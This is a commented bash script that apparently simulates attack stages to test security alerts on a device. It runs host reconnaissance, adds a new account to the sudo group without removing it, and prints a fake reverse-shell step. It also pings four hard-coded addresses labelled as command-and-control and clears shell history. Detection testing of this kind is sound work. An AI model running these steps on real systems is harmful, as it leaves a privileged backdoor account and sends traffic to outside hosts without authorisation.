#!/bin/bash
# Alert-simulation script, run from the device under test (the "attacked"
# device). The section comments in attack() name the detection each step
# appears intended to raise.
# Side effects visible in this file: a new account added to the sudo group and
# a ./pingtoCnC.txt file; neither is cleaned up by the script.
#
# Script options
# INTERACTIVE: "true" pauses for Enter before the simulated C2 stage;
# the -ni/--non-interactive flag sets it to "false".
INTERACTIVE="true"
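# Pause until the operator presses Enter, but only in interactive mode.
# Globals:   INTERACTIVE (read) - pauses only when it is exactly "true"
# Inputs:    one line from stdin, discarded
# Outputs:   the prompt, on stdout
# Returns:   the status of read (non-zero on EOF) when interactive, else 0
function interactiveCheckpoint {
  if [ "$INTERACTIVE" = true ]; then
    echo "Press [Enter] to continue attack"
    # -r stops a trailing backslash from joining the next input line, and "_"
    # discards the line instead of creating a global named after a keyword.
    read -r _
  fi
}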
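# Print one progress line prefixed with the current UTC time.
function _attack_log {
  echo "$(date -u)" " $*"
}

# Print a section title between two rule lines.
function _attack_banner {
  local rule="###################################################################"
  echo "$rule"
  echo "$1"
  echo "$rule"
}

# Run the four simulated stages in order: host reconnaissance, account
# creation, simulated C2 traffic, history clearing. Every progress and
# "success" line is printed unconditionally; no step's exit status is checked,
# so the console output is not evidence that a step actually took effect.
# When validating alerts, confirm each action on the host (for example the
# account's presence) before reading a missing alert as a detection gap.
# Globals:   INTERACTIVE (read, via interactiveCheckpoint)
# Outputs:   progress text on stdout; ./pingtoCnC.txt
# Returns:   0 (status of the final echo)
function attack {
  # Kept local: the original assigned to USER, overwriting the login-name
  # environment variable for the rest of the script and its children.
  local test_account="privilegeduser${RANDOM}"
  local cnc_ip

  # Local host reconnaissance detected
  _attack_banner " Getting device information "
  _attack_log "Conducting analysis of host data..."
  uname -a -v -n
  _attack_log "Got host data"

  # Detected suspicious use of the useradd command
  # The command lines are left exactly as they were (only quoted), since the
  # argv is presumably what the detection matches on.
  # useradd is invoked without sudo, so it fails unless the script already
  # runs as root; usermod then has no account to modify.
  # NOTE(review): the account stays in the sudo group after the run; nothing
  # here removes it, so clean-up (e.g. userdel) has to happen separately.
  _attack_banner " Create User and Escalate Privilege "
  _attack_log "Adding user named ${test_account} with privilege root to the system..."
  useradd "$test_account"
  sudo usermod -aG sudo "$test_account"
  _attack_log "Successfully added user named ${test_account} with privilege root to the system"
  # Cosmetic banner; needs the "toilet" utility, otherwise only the colour
  # codes are printed.
  echo -e "\e[01;32m$(toilet -f pagga "C&C Connected")\e[00m"
  interactiveCheckpoint

  # Reverse shells, Suspicious IP address communication
  _attack_banner " Communicating with CnC for getting attack commands "
  _attack_log "Opening reverse shell..."
  # Placeholder only: this asks bash to run the path /dev/tcp/ as a script,
  # with no host or port, so no connection is opened and the error is hidden.
  # The "established" line below is printed regardless.
  bash /dev/tcp/ 2> /dev/null
  _attack_log "Reverse shell established"
  _attack_log "Communicating with CnC server..."
  # One ICMP echo per address. Each redirect truncates the file, so only the
  # last result survives. The addresses come from the original script;
  # presumably they are there to trip IP-reputation alerts - verify before
  # relying on them.
  for cnc_ip in 209.17.96.18 209.17.96.106 209.17.96.234 106.51.80.198; do
    ping -c1 "$cnc_ip" > pingtoCnC.txt
  done
  _attack_log "Listening to CnC for future attack commands..."

  # Removal of system logs files detected
  # history -c clears this shell's in-memory history list; it deletes no log
  # or history file, whatever the messages say.
  _attack_banner " Covering Tracks - Deleting Logs and Executables "
  _attack_log "Deleting history files..."
  history -c
  _attack_log "Deleted history files"
}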
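# Print command-line help. The original called usage without defining it
# anywhere in the visible script, so --help only produced "command not found".
function usage {
  echo "Usage: ${0##*/} [-ni|--non-interactive] [-h|--help]"
}

# Parse options. Unrecognised arguments are collected and restored as the
# positional parameters; nothing in the visible script reads them afterwards.
POSITIONAL=()
while [[ $# -gt 0 ]]; do
  case "$1" in
    -ni | --non-interactive)
      INTERACTIVE=false
      # The flag takes no value, so shift once. The original shifted twice,
      # which silently dropped whatever argument followed the flag.
      shift
      ;;
    -h | --help)
      usage
      exit 0
      ;;
    *)
      # unknown option: save it in the array for later
      POSITIONAL+=("$1")
      shift
      ;;
  esac
done
set -- "${POSITIONAL[@]}" # restore positional parameters

# Runs unconditionally once parsing succeeds; there is no confirmation step
# other than the single interactive pause inside attack().
attack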